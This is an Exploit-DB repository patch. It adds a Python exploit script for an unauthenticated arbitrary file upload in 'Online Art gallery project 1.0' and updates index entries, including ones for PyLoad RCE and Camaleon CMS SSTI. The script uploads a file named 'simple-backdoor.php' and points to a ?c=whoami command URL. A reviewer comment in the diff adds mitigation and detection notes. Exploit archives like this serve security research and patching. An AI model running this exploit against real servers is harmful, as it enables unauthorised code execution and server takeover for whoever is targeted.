From 1e4f82620abfd39ccbe7962dc1f2ff1b286469a4 Mon Sep 17 00:00:00 2001
From: Exploit-DB
Date: Fri, 16 Jun 2023 00:16:25 +0000
Subject: [PATCH] DB: 2023-06-16
2 changes to exploits/shellcodes/ghdb
Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)
PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)
---
exploits/php/webapps/51524.py | 44 +++++++++++++++++++++++++++++++++++
files_exploits.csv | 5 ++--
2 files changed, 47 insertions(+), 2 deletions(-)
create mode 100755 exploits/php/webapps/51524.py
diff --git a/exploits/php/webapps/51524.py b/exploits/php/webapps/51524.py
new file mode 100755
index 000000000..1bf74b3c8
--- /dev/null
+++ b/exploits/php/webapps/51524.py
@@ -0,0 +1,44 @@
+# Exploit Title: Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)
+# Google Dork: n/a
+# Date: 14/06/2023
+# Exploit Author: Ramil Mustafayev
+# Vendor Homepage: https://github.com/projectworldsofficial
+# Software Link: https://github.com/projectworlds32/Art-Gallary-php/archive/master.zip
+# Version: 1.0
+# Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28
+# CVE : n/a
+
+# Vulnerability Description:
+#
+# Online Art Gallery Project 1.0 allows unauthenticated users to perform arbitrary file uploads via the adminHome.php page. Due to the absence of an authentication mechanism and inadequate file validation, attackers can upload malicious files, potentially leading to remote code execution and unauthorized access to the server.
+# Usage: python exploit.py http://example.com
+
+import requests
+import sys
+
+def upload_file(url, filename, file_content):
+ files = {
+ 'sliderpic': (filename, file_content, 'application/octet-stream')
+ }
+
+ data = {
+ 'img_id': '',
+ 'sliderPicSubmit': ''
+ }
+ url = url+"/Admin/adminHome.php"
+ try:
+ response = requests.post(url, files=files, data=data)
+ except:
+ print("[!] Exploit failed!")
+
+if __name__ == "__main__":
+ if len(sys.argv) < 2:
+ print("Usage: python exploit.py ")
+ sys.exit(1)
+
+ target_url = sys.argv[1]
+ file_name = "simple-backdoor.php"
+ file_content = ''
+
+ upload_file(target_url, file_name, file_content)
+ print("[+] The simple-backdoor has been uploaded.\n Check following URL: "+target_url+"/images/Slider"+file_name+"?c=whoami")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 992faea35..d2ec1fa42 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
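Review bot: The header comment block describes the flaw but gives a reader nothing to fix or detect it with; a remediation line after the `# Vulnerability Description:` paragraph would make the entry usable by defenders, e.g. `# Mitigation: require an authenticated admin session in Admin/adminHome.php before handling the upload, allowlist image types server-side, and disable PHP execution in the upload directory.` For detection, the request shape visible in `upload_file` is an unauthenticated multipart POST to `/Admin/adminHome.php` carrying a `sliderpic` file part, and the result to look for is a new non-image file under the application's images directory. Separately, `upload_file` discards `response` and uses a bare `except:`, while the `__main__` block prints its success line unconditionally, so the script's output says nothing about whether a patched install rejected the upload. Anyone retesting a fix should rely on server-side logs and the contents of the upload directory rather than on that message.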
@@ -24609,6 +24609,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39167,exploits/php/webapps/39167.txt,"Online Airline Booking System - Multiple Vulnerabilities",2016-01-05,"Manish Tanwar",webapps,php,80,2016-01-05,2016-01-05,0,OSVDB-132611;OSVDB-132610,,,,http://www.exploit-db.comOABSv1.7.zip,
 47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php,80,2019-09-09,2019-09-10,0,,"SQL Injection (SQLi)",,,,
 51337,exploits/php/webapps/51337.txt,"Online Appointment System V1.0 - Cross-Site Scripting (XSS)",2023-04-08,"Sanjay Singh",webapps,php,,2023-04-08,2023-04-08,0,,,,,,
+51524,exploits/php/webapps/51524.py,"Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)",2023-06-15,"Ramil Mustafayev",webapps,php,,2023-06-15,2023-06-15,0,,,,,,
 50089,exploits/php/webapps/50089.txt,"Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-07-05,"Subhadip Nag",webapps,php,,2021-07-05,2021-07-05,0,,,,,,
 47922,exploits/php/webapps/47922.txt,"Online Book Store 1.0 - 'bookisbn' SQL Injection",2020-01-15,"Ertebat Gostar Co",webapps,php,,2020-01-15,2020-01-15,0,,,,,,
 48775,exploits/php/webapps/48775.txt,"Online Book Store 1.0 - 'id' SQL Injection",2020-08-31,"Moaaz Taha",webapps,php,,2020-08-31,2020-08-31,0,,,,,,
@@ -34525,7 +34526,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48727,exploits/python/webapps/48727.py,"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)",2020-08-04,"Luis Vacacas",webapps,python,,2020-08-04,2020-08-04,0,CVE-2020-8816,,,,,
 38738,exploits/python/webapps/38738.txt,"Plone - 'in_portal.py' < 4.1.3 Session Hijacking",2013-07-31,"Cyrill Bannwart",webapps,python,,2013-07-31,2015-11-17,1,CVE-2013-4200;OSVDB-95863,,,,,https://www.securityfocus.com/bid/61964/info
 49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python,,2021-06-02,2021-06-02,0,CVE-2021-21337,,,,http://www.exploit-db.comProducts.PluggableAuthService-2.6.0.zip,
-51522,exploits/python/webapps/51522.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-14,2023-06-14,0,CVE-2023-0297,,,,,
+51522,exploits/python/webapps/51522.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-14,2023-06-15,1,CVE-2023-0297,,,,,
 39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info
 51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,,
 51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-06-04,1,CVE-2022-31126,,,,,
@@ -34553,7 +34554,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40086,exploits/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB - Code Execution (Metasploit)",2016-07-11,Metasploit,remote,ruby,80,2016-07-11,2016-07-11,1,CVE-2016-2098,"Metasploit Framework (MSF)",,,,
 45601,exploits/ruby/webapps/45601.txt,"AlchemyCMS 4.1 - Cross-Site Scripting",2018-10-15,"Ismail Tasdelen",webapps,ruby,80,2018-10-15,2018-10-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comalchemy_cms-4.1.0.tar.gz,
 45592,exploits/ruby/webapps/45592.txt,"CAMALEON CMS 2.4 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,ruby,80,2018-10-12,2018-10-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comcamaleon-cms-2.4.0.tar.gz,
-51489,exploits/ruby/webapps/51489.txt,"Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)",2023-05-26,"PARAG BAGUL",webapps,ruby,,2023-05-26,2023-05-26,0,CVE-2023-30145,,,,,
+51489,exploits/ruby/webapps/51489.txt,"Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)",2023-05-26,"PARAG BAGUL",webapps,ruby,,2023-05-26,2023-06-15,1,CVE-2023-30145,,,,,
 51446,exploits/ruby/webapps/51446.txt,"Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title",2023-05-23,"Yasin Gergin",webapps,ruby,,2023-05-23,2023-05-23,0,,,,,,
 46617,exploits/ruby/webapps/46617.txt,"Fat Free CRM 0.19.0 - HTML Injection",2019-03-28,"Ismail Tasdelen",webapps,ruby,80,2019-03-28,2019-03-29,0,CVE-2019-10226,,,,http://www.exploit-db.comfat_free_crm-0.18.1.tar.gz,
 41616,exploits/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,webapps,ruby,,2017-03-15,2017-03-27,1,,,,,,http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html